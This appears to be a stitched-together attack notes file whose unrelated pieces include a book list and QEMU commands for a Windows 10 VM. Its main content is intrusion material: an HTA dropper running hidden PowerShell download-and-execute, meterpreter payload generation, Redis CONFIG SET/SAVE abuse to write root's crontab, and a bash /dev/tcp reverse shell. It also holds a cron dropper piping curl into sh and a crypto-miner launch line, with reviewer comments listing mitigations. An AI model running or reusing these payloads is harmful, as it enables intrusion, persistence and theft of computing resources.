function Invoke-WebDavDelivery
Receives shellcode over a WebDAV PROPFIND channel, then loads it into memory and executes it.
This script requires its server-side counterpart (the link was not preserved in this copy) to communicate with and actually deliver the payload data.
Function: Invoke-WebDavDelivery
Author: Arno0x0x, Twitter: @Arno0x0x
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
# Installing
# Boots the Windows 10 installer ISO under UEFI (OVMF firmware via -bios) with
# KVM acceleration and the host CPU model exposed to the guest. The virtio disk
# image is attached without an explicit index, so qemu numbers it relative to
# the other -cdrom/-drive options: keep the argument order as written.
# The second cdrom (index=1) carries the virtio-win driver ISO so the installer
# can see the virtio disk and NIC.
# -net user is user-mode (slirp) networking: the guest is NATed and is not
# reachable from the LAN unless a hostfwd rule is added.
# The ~ inside file=~/... is expanded by the shell, not by qemu.
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 2048 -cdrom ~/Downloads/Win10_English_x64.iso -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -drive file=~/Downloads/virtio-win-0.1.105.iso,index=1,media=cdrom
# Running
# Same VM without the install media and with more RAM. -usbdevice tablet gives
# the guest an absolute-position pointer (no mouse grab); -rtc base=utc keeps
# the guest clock on UTC.
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 4096 -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -usbdevice tablet -rtc base=utc
# cat hta-psh.txt
<!-- HTA dropper: WScript.Shell.Run starts a hidden PowerShell (-w hidden) that
     downloads a script and executes it with IEX; the DownloadString URL has
     been stripped from this copy. The mixed-case spelling of the tags and
     object names looks like an attempt to dodge case-sensitive string
     signatures (review assumption, not stated by the author). -->
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('')"</scRipt>
# Pushes the HTA text into Redis key 'a' on a remote host (-x reads the value
# from stdin; the -h host argument was stripped from this copy). This only
# works against a Redis that accepts unauthenticated writes from this client.
# cat hta-psh.txt |redis-cli -x -h set a
# The two lines below are msfconsole commands, not shell: select the payload,
# then emit it in the hta-psh format to /var/www/1.ps1 (the file the HTA above
# is meant to fetch via DownloadString).
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
#cat 1.ps1
# Consumer side of the "RDB dump as shell script" trick (the producer is the
# redis-cli sequence that saves the dump to /tmp/w): start with a blank line,
# append the raw dump, and run the result with sh.
echo " " > /tmp/zz
cat /tmp/w >> /tmp/zz
# sh has no -e here, so the RDB's binary lines simply fail as unknown
# commands and execution continues; the key values staged as shell fragments
# (';a=`redis-cli get c`;' and 'id;redis-cli set r `$a`;#') are what runs.
/bin/sh /tmp/zz
# Read back the command output the staged fragment stored into key 'r'.
redis-cli get r
# crontab entry (not a shell line — pasting it into a shell would glob the *):
# re-runs the staged script every minute after a 10 s delay.
* * * * * sleep 10;/bin/sh /tmp/zz
# Producer side: stage shell fragments as Redis values, then redirect the
# dump file so SAVE writes an RDB to /tmp/w that is later fed to sh.
# Requires a Redis that accepts CONFIG SET and SAVE from this client without
# authentication.
redis-cli flushall
# Each value begins with ';' and ends with ';' or '#' so that whatever RDB
# bytes sit on the same line are cut off from the fragment. Key 2 reads the
# command stored in key 'c' into $a; key 1 runs `id`, then evaluates $a via
# backticks and stores its output back into key 'r'.
# NOTE(review): this assumes the dump emits key 2 before key 1. RDB key order
# is dictionary iteration order, not insertion order, so it may need retries.
redis-cli set 2 ';a=`redis-cli get c`;'
redis-cli set 1 'id;redis-cli set r `$a`;#'
# Point the dump at /tmp/w and write it.
redis-cli config set dir /tmp/
redis-cli config set dbfilename w
redis-cli save
# The command the staged fragment will run on its next execution.
redis-cli set c whoami
# NOTE(review): mitigations — bind Redis to localhost, set requirepass/ACLs,
# keep protected-mode on, and rename or disable CONFIG so SAVE cannot be
# redirected to arbitrary paths.
# Redis-to-crontab write: abuse CONFIG SET dir/dbfilename so SAVE drops an
# RDB file into root's crontab. Needs an unauthenticated Redis running as a
# user that can write to /var/spool/cron (typically root).
redis-cli flushall # for easier testing: clear all keys first
# Filler keys. Their purpose is not stated here; presumably padding so the
# cron line below lands on a clean line inside the dump (review assumption).
redis-cli set test 'test'
redis-cli set my 'mymymymymymymymymymymymy'
redis-cli set word 'wordwordwordwordwordword'
redis-cli set hello 'ringzero'
redis-cli set word1 'word1word1word1word1word1word1'
# The cron line is wrapped in blank lines so cron's parser ignores the binary
# RDB bytes around it; it touches /tmp/888 every minute as proof of execution.
# echo -e is relied on to turn the \n sequences into newlines (bash echo).
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
# /var/spool/cron/<user> is the RHEL/CentOS crontab layout. Debian/Ubuntu use
# /var/spool/cron/crontabs/ and their cron refuses files with unexpected
# ownership/permissions, so this is commonly reported not to work there.
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
# Overwrites any existing root crontab.
redis-cli save
# Same Redis-to-crontab write, with a bash reverse shell as the cron payload.
redis-cli flushall
# The cron line is padded with blank lines so cron ignores the RDB bytes
# around it. The payload is bash's /dev/tcp pseudo-device; the listener's
# host/port were stripped from this copy, so as written it points nowhere.
# Cron runs jobs with /bin/sh by default, which is why /bin/bash is invoked
# explicitly for the /dev/tcp redirection.
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/ 0>&1\n\n"|redis-cli -x set 1
# Redirect the dump into root's crontab (RHEL/CentOS layout) and write it.
# Overwrites any existing root crontab; requires Redis to run with write
# access to /var/spool/cron.
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
# NOTE(review): harden by binding to localhost, requiring auth, keeping
# protected-mode on, renaming CONFIG, and never running Redis as root.
# Fragment of a cron-persistence dropper; the enclosing script continues past
# this excerpt. First make sure common tool directories are on PATH regardless
# of the caller's environment (cron and minimal shells have a short PATH).
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Install a 15-minute cron job that fetches a remote script and pipes it
# straight into sh (remote code execution on every run; the URL was stripped
# from this copy). Written to both crontab locations to cover the RHEL-style
# (/var/spool/cron/root) and Debian-style (/var/spool/cron/crontabs/root)
# layouts. Each write replaces any existing root crontab.
echo "*/15 * * * * curl -fsSL | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL | sh" > /var/spool/cron/crontabs/root
# Disabled here: would start the yam miner against a stratum pool (pool URL
# stripped) unless a yam process is already running (ps|grep idiom).
# ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp:// &
# NOTE(review): hunt for the "curl -fsSL | sh" crontab line and /opt/yam/yam
# as indicators; clean-up must cover both crontab paths.
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then